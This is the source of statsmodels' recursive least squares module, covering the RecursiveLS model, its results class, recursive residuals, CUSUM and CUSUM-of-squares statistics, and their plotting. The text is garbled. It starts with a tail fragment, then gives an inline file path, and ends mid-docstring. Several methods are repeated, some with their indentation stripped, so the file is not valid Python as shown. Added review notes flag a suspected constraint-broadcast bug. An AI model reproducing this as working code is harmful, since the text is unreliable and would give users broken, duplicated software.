figsize=None):
r"""
Plot the recursively estimated coefficients on a given variable
Parameters
----------
variables : int or str or iterable of int or string, optional
Integer index or string name of the variable whose coefficient will
be plotted. Can also be an iterable of integers or strings. Default
is the first variable.
alpha : float, optional
The confidence intervals for the coefficient are (1 - alpha) %
legend_loc : string, optional
The location of the legend in the plot. Default is upper left.
fig : Matplotlib Figure instance, optional
If given, subplots are created in this figure instead of in a new
figure. Note that the grid will be created in the provided
figure using `fig.add_subplot()`.
figsize : tuple, optional
If a figure is created, this argument allows specifying a size.
The tuple is (width, height).
Notes
-----
All plots contain (1 - `alpha`) % confidence intervals.
"""
# Get variables
if isinstance(variables, (int, str)):
variables = [variables]
k_variables = len(variables)
# If a string was given for `variable`, try to get it from exog names
exog_names = self.model.exog_names
for i in range(k_variables):
variable = variables[i]
if isinstance(variable, str):
variables[i] = exog_names.index(variable)
# Create the plot
from scipy.stats import norm
from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
plt = _import_mpl()
fig = create_mpl_fig(fig, figsize)
for i in range(k_variables):
variable = variables[i]
ax = fig.add_subplot(k_variables, 1, i + 1)
# Get dates, if applicable
if hasattr(self.data, 'dates') and self.data.dates is not None:
dates = self.data.dates._mpl_repr()
else:
dates = np.arange(self.nobs)
d = max(self.nobs_diffuse, self.loglikelihood_burn)
# Plot the coefficient
coef = self.recursive_coefficients
ax.plot(dates[d:], coef.filtered[variable, d:],
label='Recursive estimates: %s' % exog_names[variable])
# Legend
handles, labels = ax.get_legend_handles_labels()
# Get the critical value for confidence intervals
if alpha is not None:
critical_value = norm.ppf(1 - alpha / 2.)
# Plot confidence intervals
std_errors = np.sqrt(coef.filtered_cov[variable, variable, :])
ci_lower = (
coef.filtered[variable] - critical_value * std_errors)
ci_upper = (
coef.filtered[variable] + critical_value * std_errors)
ci_poly = ax.fill_between(
dates[d:], ci_lower[d:], ci_upper[d:], alpha=0.2
)
ci_label = ('$%.3g \\%%$ confidence interval'
% ((1 - alpha)*100))
# Only add CI to legend for the first plot
if i == 0:
# Proxy artist for fill_between legend entry
# See http://matplotlib.org/1.3.1/users/legend_guide.html
p = plt.Rectangle((0, 0), 1, 1,
fc=ci_poly.get_facecolor()[0])
handles.append(p)
labels.append(ci_label)
ax.legend(handles, labels, loc=legend_loc)
# Remove xticks for all but the last plot
if i < k_variables - 1:
ax.xaxis.set_ticklabels([])
fig.tight_layout()
return fig
def _cusum_significance_bounds(self, alpha, ddof=0, points=None):
"""
Parameters
----------
alpha : float, optional
The significance bound is alpha %.
ddof : int, optional
The number of periods additional to `k_exog` to exclude in
constructing the bounds. Default is zero. This is usually used
only for testing purposes.
points : iterable, optional
The points at which to evaluate the significance bounds. Default is
two points, beginning and end of the sample.
Notes
-----
Comparing against the cusum6 package for Stata, this does not produce
exactly the same confidence bands (which are produced in cusum6 by
lw, uw) because they burn the first k_exog + 1 periods instead of the
first k_exog. If this change is performed
(so that `tmp = (self.nobs - d - 1)**0.5`), then the output here
matches cusum6.
The cusum6 behavior does not seem to be consistent with
Brown et al. (1975); it is likely they did that because they needed
three initial observations to get the initial OLS estimates, whereas
we do not need to do that.
"""
# Get the constant associated with the significance level
if alpha == 0.01:
scalar = 1.143
elif alpha == 0.05:
scalar = 0.948
elif alpha == 0.10:
scalar = 0.950
else:
raise ValueError('Invalid significance level.')
# Get the points for the significance bound lines
d = max(self.nobs_diffuse, self.loglikelihood_burn)
tmp = (self.nobs - d - ddof)**0.5
upper_line = lambda x: scalar * tmp + 2 * scalar * (x - d) / tmp
if points is None:
points = np.array([d, self.nobs])
return -upper_line(points), upper_line(points)
    def plot_cusum(self, alpha=0.05, legend_loc='upper left',
                   fig=None, figsize=None):
        r"""
        Plot the CUSUM statistic and significance bounds.

        Parameters
        ----------
        alpha : float, optional
            The plotted significance bounds are alpha %.
        legend_loc : string, optional
            The location of the legend in the plot. Default is upper left.
        fig : Matplotlib Figure instance, optional
            If given, subplots are created in this figure instead of in a new
            figure. Note that the grid will be created in the provided
            figure using `fig.add_subplot()`.
        figsize : tuple, optional
            If a figure is created, this argument allows specifying a size.
            The tuple is (width, height).

        Returns
        -------
        fig : Matplotlib Figure instance

        Notes
        -----
        Evidence of parameter instability may be found if the CUSUM statistic
        moves out of the significance bounds.

        References
        ----------
        .. [*] <NAME>., <NAME>, and <NAME>. 1975.
           "Techniques for Testing the Constancy of
           Regression Relationships over Time."
           Journal of the Royal Statistical Society.
           Series B (Methodological) 37 (2): 149-92.
        """
        # Create the plot
        from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
        plt = _import_mpl()  # NOTE(review): unused; called for the mpl check
        fig = create_mpl_fig(fig, figsize)
        ax = fig.add_subplot(1, 1, 1)
        # Get dates, if applicable
        if hasattr(self.data, 'dates') and self.data.dates is not None:
            dates = self.data.dates._mpl_repr()
        else:
            dates = np.arange(self.nobs)
        # Number of initial (diffuse / burned) observations excluded
        d = max(self.nobs_diffuse, self.loglikelihood_burn)
        # Plot cusum series and a zero reference line
        ax.plot(dates[d:], self.cusum, label='CUSUM')
        ax.hlines(0, dates[d], dates[-1], color='k', alpha=0.3)
        # Plot significance bounds (straight lines, so two endpoints suffice)
        lower_line, upper_line = self._cusum_significance_bounds(alpha)
        ax.plot([dates[d], dates[-1]], upper_line, 'k--',
                label='%d%% significance' % (alpha * 100))
        ax.plot([dates[d], dates[-1]], lower_line, 'k--')
        ax.legend(loc=legend_loc)
        return fig
def _cusum_squares_significance_bounds(self, alpha, points=None):
"""
Notes
-----
Comparing against the cusum6 package for Stata, this does not produce
exactly the same confidence bands (which are produced in cusum6 by
lww, uww) because they use a different method for computing the
critical value; in particular, they use tabled values from
Table C, pp. 364-365 of "The Econometric Analysis of Time Series"
Harvey, (1990), and use the value given to 99 observations for any
larger number of observations. In contrast, we use the approximating
critical values suggested in Edgerton and Wells (1994) which allows
computing relatively good approximations for any number of
observations.
"""
# Get the approximate critical value associated with the significance
# level
d = max(self.nobs_diffuse, self.loglikelihood_burn)
n = 0.5 * (self.nobs - d) - 1
try:
ix = [0.1, 0.05, 0.025, 0.01, 0.005].index(alpha / 2)
except ValueError:
raise ValueError('Invalid significance level.')
scalars = _cusum_squares_scalars[:, ix]
crit = scalars[0] / n**0.5 + scalars[1] / n + scalars[2] / n**1.5
# Get the points for the significance bound lines
if points is None:
points = np.array([d, self.nobs])
line = (points - d) / (self.nobs - d)
return line - crit, line + crit
    def plot_cusum_squares(self, alpha=0.05, legend_loc='upper left',
                           fig=None, figsize=None):
        r"""
        Plot the CUSUM of squares statistic and significance bounds.

        Parameters
        ----------
        alpha : float, optional
            The plotted significance bounds are alpha %.
        legend_loc : string, optional
            The location of the legend in the plot. Default is upper left.
        fig : Matplotlib Figure instance, optional
            If given, subplots are created in this figure instead of in a new
            figure. Note that the grid will be created in the provided
            figure using `fig.add_subplot()`.
        figsize : tuple, optional
            If a figure is created, this argument allows specifying a size.
            The tuple is (width, height).

        Returns
        -------
        fig : Matplotlib Figure instance

        Notes
        -----
        Evidence of parameter instability may be found if the CUSUM of squares
        statistic moves out of the significance bounds.
        Critical values used in creating the significance bounds are computed
        using the approximate formula of [1]_.

        References
        ----------
        .. [*] <NAME>., <NAME>, and <NAME>. 1975.
           "Techniques for Testing the Constancy of
           Regression Relationships over Time."
           Journal of the Royal Statistical Society.
           Series B (Methodological) 37 (2): 149-92.
        .. [1] Edgerton, David, and <NAME>. 1994.
           "Critical Values for the Cusumsq Statistic
           in Medium and Large Sized Samples."
           Oxford Bulletin of Economics and Statistics 56 (3): 355-65.
        """
        # Create the plot
        from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
        plt = _import_mpl()  # NOTE(review): unused; called for the mpl check
        fig = create_mpl_fig(fig, figsize)
        ax = fig.add_subplot(1, 1, 1)
        # Get dates, if applicable
        if hasattr(self.data, 'dates') and self.data.dates is not None:
            dates = self.data.dates._mpl_repr()
        else:
            dates = np.arange(self.nobs)
        # Number of initial (diffuse / burned) observations excluded
        d = max(self.nobs_diffuse, self.loglikelihood_burn)
        # Plot cusum-of-squares series and its null reference line (linear
        # from 0 to 1 over the retained sample)
        ax.plot(dates[d:], self.cusum_squares, label='CUSUM of squares')
        ref_line = (np.arange(d, self.nobs) - d) / (self.nobs - d)
        ax.plot(dates[d:], ref_line, 'k', alpha=0.3)
        # Plot significance bounds (straight lines, so two endpoints suffice)
        lower_line, upper_line = self._cusum_squares_significance_bounds(alpha)
        ax.plot([dates[d], dates[-1]], upper_line, 'k--',
                label='%d%% significance' % (alpha * 100))
        ax.plot([dates[d], dates[-1]], lower_line, 'k--')
        ax.legend(loc=legend_loc)
        return fig
class RecursiveLSResultsWrapper(MLEResultsWrapper):
    # Wrapper exposing pandas-aware attributes/methods for RecursiveLSResults.
    # No wrapping rules are added beyond MLEResultsWrapper; the empty dicts
    # are kept as hook points for future additions.
    _attrs = {}
    _wrap_attrs = wrap.union_dicts(MLEResultsWrapper._wrap_attrs,
                                   _attrs)
    _methods = {}
    _wrap_methods = wrap.union_dicts(MLEResultsWrapper._wrap_methods,
                                     _methods)
wrap.populate_wrapper(RecursiveLSResultsWrapper, RecursiveLSResults) | statsmodels/regression/recursive_ls.py | from __future__ import division, absolute_import, print_function
# Python 2/3 compatibility shim: Python 3 has no builtin `unicode`, so alias
# it to `str` (it is used below in `get_prediction` for an isinstance check).
try: unicode
except NameError: unicode = str
from warnings import warn
from statsmodels.compat.collections import OrderedDict
import numpy as np
import pandas as pd
from statsmodels.regression.linear_model import OLS
from statsmodels.tools.data import _is_using_pandas
from statsmodels.tsa.statespace.mlemodel import (
MLEModel, MLEResults, MLEResultsWrapper, PredictionResults,
PredictionResultsWrapper)
from statsmodels.tools.tools import Bunch
from statsmodels.tools.decorators import cache_readonly, resettable_cache
import statsmodels.base.wrapper as wrap
# Columns are alpha = 0.1, 0.05, 0.025, 0.01, 0.005
# Rows are the coefficients (a, b, c) of the Edgerton & Wells (1994)
# approximation crit = a / n**0.5 + b / n + c / n**1.5, as used in
# RecursiveLSResults._cusum_squares_significance_bounds.
_cusum_squares_scalars = np.array([
    [1.0729830, 1.2238734, 1.3581015, 1.5174271, 1.6276236],
    [-0.6698868, -0.6700069, -0.6701218, -0.6702672, -0.6703724],
    [-0.5816458, -0.7351697, -0.8858694, -1.0847745, -1.2365861]
])
class RecursiveLS(MLEModel):
    r"""
    Recursive least squares

    Parameters
    ----------
    endog : array_like
        The observed time-series process :math:`y`
    exog : array_like
        Array of exogenous regressors, shaped nobs x k.
    constraints : array-like, str, or tuple
        - array : An r x k array where r is the number of restrictions to
          test and k is the number of regressors. It is assumed that the
          linear combination is equal to zero.
        - str : The full hypotheses to test can be given as a string.
          See the examples.
        - tuple : A tuple of arrays in the form (R, q), ``q`` can be
          either a scalar or a length p row vector.

    Notes
    -----
    Recursive least squares (RLS) corresponds to expanding window ordinary
    least squares (OLS).
    This model applies the Kalman filter to compute recursive estimates of the
    coefficients and recursive residuals.

    References
    ----------
    .. [*] <NAME>, and <NAME>. 2012.
       Time Series Analysis by State Space Methods: Second Edition.
       Oxford University Press.
    """
    def __init__(self, endog, exog, constraints=None, **kwargs):
        # Standardize data
        if not _is_using_pandas(endog, None):
            endog = np.asanyarray(endog)
        exog_is_using_pandas = _is_using_pandas(exog, None)
        if not exog_is_using_pandas:
            exog = np.asarray(exog)
        # Make sure we have 2-dimensional array
        if exog.ndim == 1:
            if not exog_is_using_pandas:
                exog = exog[:, None]
            else:
                exog = pd.DataFrame(exog)
        self.k_exog = exog.shape[1]
        # Handle constraints (R beta = q); patsy accepts an array, a string,
        # or an (R, q) tuple.
        self.k_constraints = 0
        self._r_matrix = self._q_matrix = None
        if constraints is not None:
            from patsy import DesignInfo
            from statsmodels.base.data import handle_data
            data = handle_data(endog, exog, **kwargs)
            names = data.param_names
            LC = DesignInfo(names).linear_constraint(constraints)
            self._r_matrix, self._q_matrix = LC.coefs, LC.constants
            self.k_constraints = self._r_matrix.shape[0]
            # Constraints are imposed by appending one "fake" endog column
            # per restriction, holding the constants q, observed exactly.
            endog = np.c_[endog, np.zeros((len(endog), len(self._r_matrix)))]
            # NOTE(review): `_q_matrix` has shape (k_constraints, 1) while the
            # target slice is (nobs, k_constraints); the broadcast appears to
            # fail for more than one constraint — newer statsmodels assigns
            # `self._q_matrix[:, 0]`. TODO confirm.
            endog[:, 1:] = self._q_matrix
        # Handle coefficient initialization: diffuse, since the coefficients
        # are non-stationary states with no natural prior.
        kwargs.setdefault('initialization', 'diffuse')
        # Initialize the state space representation
        super(RecursiveLS, self).__init__(
            endog, k_states=self.k_exog, exog=exog, **kwargs)
        # Use univariate filtering by default
        self.ssm.filter_univariate = True
        # Concentrate the scale out of the likelihood function
        self.ssm.filter_concentrated = True
        # Setup the state space representation: the state is the coefficient
        # vector, so the time-varying design row at time t is the regressor
        # row x_t.
        self['design'] = np.zeros((self.k_endog, self.k_states, self.nobs))
        self['design', 0] = self.exog[:, :, None].T
        if self._r_matrix is not None:
            # The "fake" constraint observations load on the states via R
            self['design', 1:, :] = self._r_matrix[:, :, None]
        self['transition'] = np.eye(self.k_states)
        # Notice that the filter output does not depend on the measurement
        # variance, so we set it here to 1
        self['obs_cov', 0, 0] = 1.
        # NOTE(review): duplicate of the identity `transition` assignment a
        # few lines above; harmless but redundant.
        self['transition'] = np.eye(self.k_states)
        # Linear constraints are technically imposed by adding "fake" endog
        # variables that are used during filtering, but for all model- and
        # results-based purposes we want k_endog = 1.
        if self._r_matrix is not None:
            self.k_endog = 1
    @classmethod
    def from_formula(cls, formula, data, subset=None, constraints=None):
        # Deliberately skip MLEModel in the MRO and call the base Model
        # implementation — presumably because MLEModel's `from_formula` does
        # not accept the `constraints` argument. TODO confirm.
        return super(MLEModel, cls).from_formula(formula, data, subset,
                                                 constraints=constraints)
    def fit(self):
        """
        Fits the model by application of the Kalman filter

        Returns
        -------
        RecursiveLSResults
        """
        # Two passes: the first smoothing pass recovers the concentrated
        # scale estimate; the second re-runs the smoother with that scale
        # held fixed so the wrapped results report it.
        smoother_results = self.smooth(return_ssm=True)
        with self.ssm.fixed_scale(smoother_results.scale):
            res = self.smooth()
        return res
    def filter(self, return_ssm=False, **kwargs):
        # Get the state space output; RLS has no free parameters, hence the
        # empty params vector passed to the filter.
        result = super(RecursiveLS, self).filter([], transformed=True,
                                                 cov_type='none',
                                                 return_ssm=True, **kwargs)
        # Wrap in a results object
        if not return_ssm:
            # Final-period filtered state and covariance serve as the
            # full-sample parameter estimates.
            params = result.filtered_state[:, -1]
            cov_kwds = {
                'custom_cov_type': 'nonrobust',
                'custom_cov_params': result.filtered_state_cov[:, :, -1],
                'custom_description': ('Parameters and covariance matrix'
                                       ' estimates are RLS estimates'
                                       ' conditional on the entire sample.')
            }
            result = RecursiveLSResultsWrapper(
                RecursiveLSResults(self, params, result, cov_type='custom',
                                   cov_kwds=cov_kwds)
            )
        return result
    def smooth(self, return_ssm=False, **kwargs):
        # Mirrors `filter` above, but runs the smoother as well.
        result = super(RecursiveLS, self).smooth([], transformed=True,
                                                 cov_type='none',
                                                 return_ssm=True, **kwargs)
        # Wrap in a results object
        if not return_ssm:
            params = result.filtered_state[:, -1]
            cov_kwds = {
                'custom_cov_type': 'nonrobust',
                'custom_cov_params': result.filtered_state_cov[:, :, -1],
                'custom_description': ('Parameters and covariance matrix'
                                       ' estimates are RLS estimates'
                                       ' conditional on the entire sample.')
            }
            result = RecursiveLSResultsWrapper(
                RecursiveLSResults(self, params, result, cov_type='custom',
                                   cov_kwds=cov_kwds)
            )
        return result
    @property
    def param_names(self):
        # The parameters are exactly the regression coefficients
        return self.exog_names
    @property
    def start_params(self):
        # There are no free parameters to estimate: the coefficients are
        # states and the scale is concentrated out, so this is empty.
        return np.zeros(0)
    def update(self, params, **kwargs):
        """
        Update the parameters of the model

        Updates the representation matrices to fill in the new parameter
        values.

        Parameters
        ----------
        params : array_like
            Array of new parameters.
        transformed : boolean, optional
            Whether or not `params` is already transformed. If set to False,
            `transform_params` is called. Default is True..

        Returns
        -------
        params : array_like
            Array of parameters.
        """
        # NOTE(review): intentionally a no-op (returns None despite the
        # docstring) — RLS has no free parameters to place in the system
        # matrices; see `start_params`.
        pass
class RecursiveLSResults(MLEResults):
"""
Class to hold results from fitting a recursive least squares model.
Parameters
----------
model : RecursiveLS instance
The fitted model instance
Attributes
----------
specification : dictionary
Dictionary including all attributes from the recursive least squares
model instance.
See Also
--------
statsmodels.tsa.statespace.kalman_filter.FilterResults
statsmodels.tsa.statespace.mlemodel.MLEResults
"""
    def __init__(self, model, params, filter_results, cov_type='opg',
                 **kwargs):
        """Initialize RLS results, adjusting degrees of freedom for RLS."""
        super(RecursiveLSResults, self).__init__(
            model, params, filter_results, cov_type, **kwargs)
        # Since we are overriding params with things that aren't MLE params,
        # need to adjust df's: the model df is the number of burned/diffuse
        # periods less the number of imposed constraints.
        q = max(self.loglikelihood_burn, self.k_diffuse_states)
        self.df_model = q - self.model.k_constraints
        self.df_resid = self.nobs_effective - self.df_model
        # Save _init_kwds
        self._init_kwds = self.model._get_init_kwds()
        # Save the model specification for use by e.g. recursive_coefficients
        self.specification = Bunch(**{
            'k_exog': self.model.k_exog,
            'k_constraints': self.model.k_constraints})
@property
def recursive_coefficients(self):
"""
Estimates of regression coefficients, recursively estimated
Returns
-------
out: Bunch
Has the following attributes:
- `filtered`: a time series array with the filtered estimate of
the component
- `filtered_cov`: a time series array with the filtered estimate of
the variance/covariance of the component
- `smoothed`: a time series array with the smoothed estimate of
the component
- `smoothed_cov`: a time series array with the smoothed estimate of
the variance/covariance of the component
- `offset`: an integer giving the offset in the state vector where
this component begins
"""
out = None
spec = self.specification
start = offset = 0
end = offset + spec.k_exog
out = Bunch(
filtered=self.filtered_state[start:end],
filtered_cov=self.filtered_state_cov[start:end, start:end],
smoothed=None, smoothed_cov=None,
offset=offset
)
if self.smoothed_state is not None:
out.smoothed = self.smoothed_state[start:end]
if self.smoothed_state_cov is not None:
out.smoothed_cov = (
self.smoothed_state_cov[start:end, start:end])
return out
    @cache_readonly
    def resid_recursive(self):
        r"""
        Recursive residuals

        Returns
        -------
        resid_recursive : array_like
            An array of length `nobs` holding the recursive
            residuals.

        Notes
        -----
        These quantities are defined in, for example, Harvey (1989)
        section 5.4. In fact, there he defines the standardized innovations in
        equation 5.4.1, but in his version they have non-unit variance, whereas
        the standardized forecast errors computed by the Kalman filter here
        assume unit variance. To convert to Harvey's definition, we need to
        multiply by the standard deviation.
        Harvey notes that in smaller samples, "although the second moment
        of the :math:`\tilde \sigma_*^{-1} \tilde v_t`'s is unity, the
        variance is not necessarily equal to unity as the mean need not be
        equal to zero", and he defines an alternative version (which are
        not provided here).
        """
        # Rescale the unit-variance standardized forecast errors by the
        # square root of the estimated scale to match Harvey's definition.
        return (self.filter_results.standardized_forecasts_error[0] *
                self.scale**0.5)
    @cache_readonly
    def cusum(self):
        r"""
        Cumulative sum of standardized recursive residuals statistics

        Returns
        -------
        cusum : array_like
            An array of length `nobs - k_exog` holding the
            CUSUM statistics.

        Notes
        -----
        The CUSUM statistic takes the form:

        .. math::

            W_t = \frac{1}{\hat \sigma} \sum_{j=k+1}^t w_j

        where :math:`w_j` is the recursive residual at time :math:`j` and
        :math:`\hat \sigma` is the estimate of the standard deviation
        from the full sample.
        Excludes the first `k_exog` datapoints.
        Due to differences in the way :math:`\hat \sigma` is calculated, the
        output of this function differs slightly from the output in the
        R package strucchange and the Stata contributed .ado file cusum6. The
        calculation in this package is consistent with the description of
        Brown et al. (1975)

        References
        ----------
        .. [*] <NAME>., <NAME>, and <NAME>. 1975.
           "Techniques for Testing the Constancy of
           Regression Relationships over Time."
           Journal of the Royal Statistical Society.
           Series B (Methodological) 37 (2): 149-92.
        """
        # Drop the d initial (diffuse / burned) periods, then normalize the
        # running sum by the bias-corrected (ddof=1) standard deviation of
        # the retained recursive residuals.
        d = max(self.nobs_diffuse, self.loglikelihood_burn)
        return (np.cumsum(self.resid_recursive[d:]) /
                np.std(self.resid_recursive[d:], ddof=1))
    @cache_readonly
    def cusum_squares(self):
        r"""
        Cumulative sum of squares of standardized recursive residuals
        statistics

        Returns
        -------
        cusum_squares : array_like
            An array of length `nobs - k_exog` holding the
            CUSUM of squares statistics.

        Notes
        -----
        The CUSUM of squares statistic takes the form:

        .. math::

            s_t = \left ( \sum_{j=k+1}^t w_j^2 \right ) \Bigg /
                  \left ( \sum_{j=k+1}^T w_j^2 \right )

        where :math:`w_j` is the recursive residual at time :math:`j`.
        Excludes the first `k_exog` datapoints.

        References
        ----------
        .. [*] <NAME>., <NAME>, and <NAME>. 1975.
           "Techniques for Testing the Constancy of
           Regression Relationships over Time."
           Journal of the Royal Statistical Society.
           Series B (Methodological) 37 (2): 149-92.
        """
        # Running sum of squared recursive residuals, normalized by the full
        # (retained) sample total so the statistic rises from ~0 to exactly 1.
        d = max(self.nobs_diffuse, self.loglikelihood_burn)
        numer = np.cumsum(self.resid_recursive[d:]**2)
        denom = numer[-1]
        return numer / denom
@cache_readonly
def llf_recursive_obs(self):
"""
(float) Loglikelihood at observation, computed from recursive residuals
"""
from scipy.stats import norm
return np.log(norm.pdf(self.resid_recursive, loc=0,
scale=self.scale**0.5))
    @cache_readonly
    def llf_recursive(self):
        """
        (float) Loglikelihood defined by recursive residuals, equivalent to OLS
        """
        # Sum of the per-observation Gaussian loglikelihoods
        return np.sum(self.llf_recursive_obs)
    @cache_readonly
    def ssr(self):
        """(float) Sum of squared residuals, excluding burned observations."""
        d = max(self.nobs_diffuse, self.loglikelihood_burn)
        # obs_cov[0, 0, 0] holds the fitted scale after `fit` fixes it —
        # presumably the residual variance estimate; TODO confirm.
        return (self.nobs - d) * self.filter_results.obs_cov[0, 0, 0]
    @cache_readonly
    def centered_tss(self):
        """(float) Total sum of squares around the sample mean."""
        # NOTE(review): the mean is taken over the full `endog` array while
        # the deviations use row 0 only; with constraints `endog` has extra
        # rows, so verify this is intended for constrained models.
        return np.sum((self.filter_results.endog[0] -
                       np.mean(self.filter_results.endog))**2)
    @cache_readonly
    def uncentered_tss(self):
        """(float) Total sum of squares around zero."""
        return np.sum((self.filter_results.endog[0])**2)
    @cache_readonly
    def ess(self):
        """(float) Explained sum of squares; centered iff a constant is present."""
        if self.k_constant:
            return self.centered_tss - self.ssr
        else:
            return self.uncentered_tss - self.ssr
    @cache_readonly
    def rsquared(self):
        """(float) R-squared; uncentered when the model has no constant."""
        if self.k_constant:
            return 1 - self.ssr / self.centered_tss
        else:
            return 1 - self.ssr / self.uncentered_tss
    @cache_readonly
    def mse_model(self):
        """(float) Mean squared error of the model: ess / df_model."""
        return self.ess / self.df_model
    @cache_readonly
    def mse_resid(self):
        """(float) Mean squared error of the residuals: ssr / df_resid."""
        return self.ssr / self.df_resid
    @cache_readonly
    def mse_total(self):
        """(float) Total mean squared error: tss / (df_resid + df_model)."""
        if self.k_constant:
            return self.centered_tss / (self.df_resid + self.df_model)
        else:
            return self.uncentered_tss / (self.df_resid + self.df_model)
    def get_prediction(self, start=None, end=None, dynamic=False,
                       index=None, **kwargs):
        # Note: need to override this, because we currently don't support
        # dynamic prediction or forecasts when there are constraints.
        if start is None:
            start = self.model._index[0]
        # Handle start, end, dynamic: resolve labels/dates to integer
        # locations and the number of out-of-sample periods requested
        start, end, out_of_sample, prediction_index = (
            self.model._get_prediction_index(start, end, index))
        # Handle `dynamic`: a date/label is resolved via the model index
        # (`unicode` is the module-level py2/3 alias for `str`)
        if isinstance(dynamic, (bytes, unicode)):
            dynamic, _, _ = self.model._get_index_loc(dynamic)
        if self.model._r_matrix is not None and (out_of_sample or dynamic):
            raise NotImplementedError('Cannot yet perform out-of-sample or'
                                      ' dynamic prediction in models with'
                                      ' constraints.')
        # Perform the prediction
        # This is a (k_endog x npredictions) array; don't want to squeeze in
        # case of npredictions = 1
        prediction_results = self.filter_results.predict(
            start, end + out_of_sample + 1, dynamic, **kwargs)
        # Return a new mlemodel.PredictionResults object
        return PredictionResultsWrapper(PredictionResults(
            self, prediction_results, row_labels=prediction_index))
    # Inherit the user-facing docstring from the base implementation
    get_prediction.__doc__ = MLEResults.get_prediction.__doc__
def plot_recursive_coefficient(self, variables=0, alpha=0.05,
legend_loc='upper left', fig=None,
figsize=None):
r"""
Plot the recursively estimated coefficients on a given variable
Parameters
----------
variables : int or str or iterable of int or string, optional
Integer index or string name of the variable whose coefficient will
be plotted. Can also be an iterable of integers or strings. Default
is the first variable.
alpha : float, optional
The confidence intervals for the coefficient are (1 - alpha) %
legend_loc : string, optional
The location of the legend in the plot. Default is upper left.
fig : Matplotlib Figure instance, optional
If given, subplots are created in this figure instead of in a new
figure. Note that the grid will be created in the provided
figure using `fig.add_subplot()`.
figsize : tuple, optional
If a figure is created, this argument allows specifying a size.
The tuple is (width, height).
Notes
-----
All plots contain (1 - `alpha`) % confidence intervals.
"""
# Get variables
if isinstance(variables, (int, str)):
variables = [variables]
k_variables = len(variables)
# If a string was given for `variable`, try to get it from exog names
exog_names = self.model.exog_names
for i in range(k_variables):
variable = variables[i]
if isinstance(variable, str):
variables[i] = exog_names.index(variable)
# Create the plot
from scipy.stats import norm
from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
plt = _import_mpl()
fig = create_mpl_fig(fig, figsize)
for i in range(k_variables):
variable = variables[i]
ax = fig.add_subplot(k_variables, 1, i + 1)
# Get dates, if applicable
if hasattr(self.data, 'dates') and self.data.dates is not None:
dates = self.data.dates._mpl_repr()
else:
dates = np.arange(self.nobs)
d = max(self.nobs_diffuse, self.loglikelihood_burn)
# Plot the coefficient
coef = self.recursive_coefficients
ax.plot(dates[d:], coef.filtered[variable, d:],
label='Recursive estimates: %s' % exog_names[variable])
# Legend
handles, labels = ax.get_legend_handles_labels()
# Get the critical value for confidence intervals
if alpha is not None:
critical_value = norm.ppf(1 - alpha / 2.)
# Plot confidence intervals
std_errors = np.sqrt(coef.filtered_cov[variable, variable, :])
ci_lower = (
coef.filtered[variable] - critical_value * std_errors)
ci_upper = (
coef.filtered[variable] + critical_value * std_errors)
ci_poly = ax.fill_between(
dates[d:], ci_lower[d:], ci_upper[d:], alpha=0.2
)
ci_label = ('$%.3g \\%%$ confidence interval'
% ((1 - alpha)*100))
# Only add CI to legend for the first plot
if i == 0:
# Proxy artist for fill_between legend entry
# See http://matplotlib.org/1.3.1/users/legend_guide.html
p = plt.Rectangle((0, 0), 1, 1,
fc=ci_poly.get_facecolor()[0])
handles.append(p)
labels.append(ci_label)
ax.legend(handles, labels, loc=legend_loc)
# Remove xticks for all but the last plot
if i < k_variables - 1:
ax.xaxis.set_ticklabels([])
fig.tight_layout()
return fig
def _cusum_significance_bounds(self, alpha, ddof=0, points=None):
"""
Parameters
----------
alpha : float, optional
The significance bound is alpha %.
ddof : int, optional
The number of periods additional to `k_exog` to exclude in
constructing the bounds. Default is zero. This is usually used
only for testing purposes.
points : iterable, optional
The points at which to evaluate the significance bounds. Default is
two points, beginning and end of the sample.
Notes
-----
Comparing against the cusum6 package for Stata, this does not produce
exactly the same confidence bands (which are produced in cusum6 by
lw, uw) because they burn the first k_exog + 1 periods instead of the
first k_exog. If this change is performed
(so that `tmp = (self.nobs - d - 1)**0.5`), then the output here
matches cusum6.
The cusum6 behavior does not seem to be consistent with
Brown et al. (1975); it is likely they did that because they needed
three initial observations to get the initial OLS estimates, whereas
we do not need to do that.
"""
# Get the constant associated with the significance level
if alpha == 0.01:
scalar = 1.143
elif alpha == 0.05:
scalar = 0.948
elif alpha == 0.10:
scalar = 0.950
else:
raise ValueError('Invalid significance level.')
# Get the points for the significance bound lines
d = max(self.nobs_diffuse, self.loglikelihood_burn)
tmp = (self.nobs - d - ddof)**0.5
upper_line = lambda x: scalar * tmp + 2 * scalar * (x - d) / tmp
if points is None:
points = np.array([d, self.nobs])
return -upper_line(points), upper_line(points)
    def plot_cusum(self, alpha=0.05, legend_loc='upper left',
                   fig=None, figsize=None):
        r"""
        Plot the CUSUM statistic and significance bounds.

        Parameters
        ----------
        alpha : float, optional
            The plotted significance bounds are alpha %.
        legend_loc : string, optional
            The location of the legend in the plot. Default is upper left.
        fig : Matplotlib Figure instance, optional
            If given, subplots are created in this figure instead of in a new
            figure. Note that the grid will be created in the provided
            figure using `fig.add_subplot()`.
        figsize : tuple, optional
            If a figure is created, this argument allows specifying a size.
            The tuple is (width, height).

        Returns
        -------
        fig : Matplotlib Figure instance

        Notes
        -----
        Evidence of parameter instability may be found if the CUSUM statistic
        moves out of the significance bounds.

        References
        ----------
        .. [*] <NAME>., <NAME>, and <NAME>. 1975.
           "Techniques for Testing the Constancy of
           Regression Relationships over Time."
           Journal of the Royal Statistical Society.
           Series B (Methodological) 37 (2): 149-92.
        """
        # Create the plot
        from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
        plt = _import_mpl()  # NOTE(review): unused; called for the mpl check
        fig = create_mpl_fig(fig, figsize)
        ax = fig.add_subplot(1, 1, 1)
        # Get dates, if applicable
        if hasattr(self.data, 'dates') and self.data.dates is not None:
            dates = self.data.dates._mpl_repr()
        else:
            dates = np.arange(self.nobs)
        # Number of initial (diffuse / burned) observations excluded
        d = max(self.nobs_diffuse, self.loglikelihood_burn)
        # Plot cusum series and a zero reference line
        ax.plot(dates[d:], self.cusum, label='CUSUM')
        ax.hlines(0, dates[d], dates[-1], color='k', alpha=0.3)
        # Plot significance bounds (straight lines, so two endpoints suffice)
        lower_line, upper_line = self._cusum_significance_bounds(alpha)
        ax.plot([dates[d], dates[-1]], upper_line, 'k--',
                label='%d%% significance' % (alpha * 100))
        ax.plot([dates[d], dates[-1]], lower_line, 'k--')
        ax.legend(loc=legend_loc)
        return fig
def _cusum_squares_significance_bounds(self, alpha, points=None):
"""
Notes
-----
